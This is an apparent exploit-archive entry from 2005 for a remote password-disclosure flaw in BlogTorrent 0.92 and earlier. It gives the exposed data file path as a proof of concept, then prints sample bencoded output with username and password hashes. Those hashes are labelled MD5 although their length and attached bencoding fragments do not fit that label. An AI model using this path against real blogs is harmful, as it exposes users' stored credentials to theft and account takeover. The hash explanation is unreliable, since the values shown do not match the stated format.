[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlogTorrent <= 0.92 Remote Password Disclosure Exploit
# Published : 2005-07-11
# Author : LazyCrs
# Previous Title : phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
# Next Title : Cyphor 0.19 (show.php id) Remote SQL Injection Exploit
# Edited for easy info. /str0ke
Software: BlogTorrent 0.92 <=
Vendor: http://www.blogtorrent.com/
Author: LazyCrs && pjphem
Date: 10/07/2005
Type: Remote/Local User Password Disclosure
#0x03 - POC
http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
Username (crypt in md5) -> 14ae696abdca1688dd577fe486c3981f331457b0d7
Password (crypt in md5) -> d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!
# www.Syue.com [2005-07-11]